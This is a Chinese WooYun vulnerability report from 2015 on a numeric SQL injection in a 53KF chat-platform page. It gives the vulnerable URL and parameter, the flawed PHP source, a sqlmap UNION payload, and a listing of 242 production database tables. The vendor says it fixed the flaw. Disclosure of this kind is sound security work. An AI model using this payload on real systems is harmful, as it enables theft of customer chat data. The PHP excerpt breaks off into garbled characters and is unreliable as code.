当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2015-92782

漏洞标题: 53kf某处root权限SQL注入

相关厂商: 53KF企业在线平台

漏洞作者: feng认证白帽子

提交时间: 2015-01-20 00:42

公开时间: 2015-03-06 00:44

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php+数字类型注射 Mysql

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-20: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-30: 细节向核心白帽子及相关领域专家公开
2015-02-09: 细节向普通白帽子公开
2015-02-19: 细节向实习白帽子公开
2015-03-06: 细节向公众公开

简要描述:

53kf某处root权限SQL注入

详细说明:

漏洞url为http://www5.53kf.com/iframe_brief.php?style_id=106000198&language=cn

问题参数为style_id,数字型注入,支持union查询



531.jpg





看看可以loadfile,以下是存在注入的这个php文件源码



<?php



define("IN_OK",true);

require_once('include/global.php');



$style_id = get_value("style_id");

$language = get_value("language");



$notes = "";



$sql = "select config_value from company_config where style_id=".$style_id." and config_id='company_notes' and company_id!=0";

$notes = db_query11($sql);



if($notes!="")

{

$notes = matchQQ($notes);

}



$tpl->assign("notes", $notes);

$tpl->display("iframe_brief.htm");



// 接收$_GET[]的值

function get_value($get_name, $re="")

{

if(isset($_GET[$get_name]) && trim($_GET[$get_name])!="")

{

$re = filterSQL($_GET[$get_name]);

}

return $re;

}



// 解析QQ123456

function matchQQ($str)

{

global $language, $master_host;



title = "";

if($language=="cn")

{

$title = "点击跟我QQ聊";

}

else if($language=="tw")

{

$title = "點擊跟我QQ聊";

}

else if($language=="en")

{

$title = "Click to chat with me";

}

else

{

$title = "Click to chat with me";

}

$str = preg_replace("/qq([0-9]+)/i","<img border=\"0\" title=\"".$title."\" src=\"http://".$master_host."/img/qq.gif\" onclick=\"addQQ('$1')\" style=\"cursor:pointer\"/>",$str);

"&WGW&âG7G#°§Ð £ó



漏洞证明:

涉及到大量的数据,涉及到2W+的企业,看看表有多少吧



Place: GET

Parameter: style_id

Type: UNION query

Title: MySQL UNION query (NULL) - 1 column (custom)

Payload: style_id=-5466 UNION ALL SELECT CONCAT(0x716c756e71,0x6b7852584141

4517753,0x71746f6a71)#&language=cn

---

[22:50:18] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5.0.11

[22:50:18] [INFO] fetching tables for database: 'talk'

[22:50:18] [INFO] the SQL query used returns 242 entries

[22:50:18] [INFO] starting 10 threads

Database: talk

[242 tables]

+--------------------------------+

| C3P0TestTable |

| identity |

| module |

| access |

| access_log |

| account_switch |

| agent_oper |

| agent_style_lock |

| area_kf |

| autoreply |

| block_user |

| chat_count |

| chat_count_201310111524 |

| chat_count_result |

| chat_nation |

| chat_search |

| chat_tables |

| chat_worker |

| company |

| company_ad |

| company_config |

| company_etel |

| company_style |

| company_tinet |

| company_tinet_cno |

| conf_ip1 |

| conf_ip1_old |

| conf_sync |

| config_id_remark |

| config_value_remark |

| counter |

| cus_bill |

| cus_group |

| cus_link |

| cus_mail |

| cus_sms |

| cus_theme |

| cus_user |

| cus_web_msg |

| customer |

| cyy |

| cyy_group |

| daemonlog_recv |

| daemonlog_send |

| disconnect_statistics |

| download_job |

| email |

| err_infos |

| err_infos_kf |

| etel_logo |

| face |

| file |

| identity_role_id |

| ill_words |

| image |

| imessage |

| inner_identity |

| kf_group |

| kf_group_newthing |

| kf_group_upload |

| kf_share |

| link |

| login_off |

| logo |

| logsql |

| mail_template |

| mailqueue |

| message |

| message_buffer |

| message_d1 |

| message_d10 |

| message_d11 |

| message_d12 |

| message_d13 |

| message_d14 |

| message_d15 |

| message_d16 |

| message_d17 |

| message_d18 |

| message_d19 |

| message_d2 |

| message_d20 |

| message_d21 |

| message_d22 |

| message_d23 |

| message_d24 |

| message_d25 |

| message_d26 |

| message_d27 |

| message_d28 |

| message_d29 |

| message_d3 |

| message_d30 |

| message_d31 |

| message_d32 |

| message_d33 |

| message_d34 |

| message_d35 |

| message_d36 |

| message_d37 |

| message_d38 |

| message_d39 |

| message_d4 |

| message_d40 |

| message_d41 |

| message_d42 |

| message_d43 |

| message_d44 |

| message_d45 |

| message_d46 |

| message_d47 |

| message_d48 |

| message_d49 |

| message_d5 |

| message_d50 |

| message_d51 |

| message_d52 |

| message_d53 |

| message_d6 |

| message_d7 |

| message_d8 |

| message_d9 |

| module_new |

| module_special |

| module_style_num_bak |

| msg_reply |

| operate_log |

| quality_tj |

| robot |

| robot_hot |

| robot_mem |

| room_message |

| sms_config |

| sms_lword |

| sph_counter |

| sql_sync |

| stat_keyword_month |

| stat_place |

| stat_search |

| stat_to |

| statistic |

| statistic_from |

| statistic_mobile |

| statistic_nation |

| statistic_net |

| statistic_place |

| sync_cus_user |

| sync_worker_stat |

| sys_notify |

| talk_evalu |

| talk_his |

| talk_his_buffer |

| talk_his_d1 |

| talk_his_d10 |

| talk_his_d11 |

| talk_his_d12 |

| talk_his_d13 |

| talk_his_d14 |

| talk_his_d15 |

| talk_his_d16 |

| talk_his_d17 |

| talk_his_d18 |

| talk_his_d19 |

| talk_his_d2 |

| talk_his_d20 |

| talk_his_d21 |

| talk_his_d22 |

| talk_his_d23 |

| talk_his_d24 |

| talk_his_d25 |

| talk_his_d26 |

| talk_his_d27 |

| talk_his_d28 |

| talk_his_d29 |

| talk_his_d3 |

| talk_his_d30 |

| talk_his_d31 |

| talk_his_d32 |

| talk_his_d33 |

| talk_his_d34 |

| talk_his_d35 |

| talk_his_d36 |

| talk_his_d37 |

| talk_his_d38 |

| talk_his_d39 |

| talk_his_d4 |

| talk_his_d40 |

| talk_his_d41 |

| talk_his_d42 |

| talk_his_d43 |

| talk_his_d44 |

| talk_his_d45 |

| talk_his_d46 |

| talk_his_d47 |

| talk_his_d48 |

| talk_his_d49 |

| talk_his_d5 |

| talk_his_d50 |

| talk_his_d51 |

| talk_his_d52 |

| talk_his_d53 |

| talk_his_d6 |

| talk_his_d7 |

| talk_his_d8 |

| talk_his_d9 |

| talk_his_delete |

| talk_his_temp |

| talk_id |

| talk_quality |

| talk_subject |

| talk_theme |

| talk_vote |

| talk_weixin |

| temp_download_2talk_his |

| temp_download_chat_nation |

| temp_download_chat_worker |

| temp_download_cus_user |

| temp_download_imessage |

| temp_download_message |

| temp_download_stat_place |

| temp_download_statistic |

| temp_download_statistic_from |

| temp_download_statistic_nation |

| temp_download_statistic_net |

| temp_download_statistic_place |

| temp_download_talk_his |

| temp_download_worker |

| v5_company_config |

| visitor_lnk |

| visitor_trace |

| visitor_trace_old0730 |

| wechat_guest |

| weixin_config |

| worker |

| worker_config |

| worker_group |

| worker_online_log |

| worker_online_log_detail |

| zsk_category |

| zsk_key |

| zsk_noanswer |

| zsk_question |

+--------------------------------+

修复方案:

你们专家,期待下一集吧

版权声明:转载请注明来源 feng@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-20 09:17

厂商回复:

感谢对于问题的反馈,问题已经紧急修复,谢谢

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录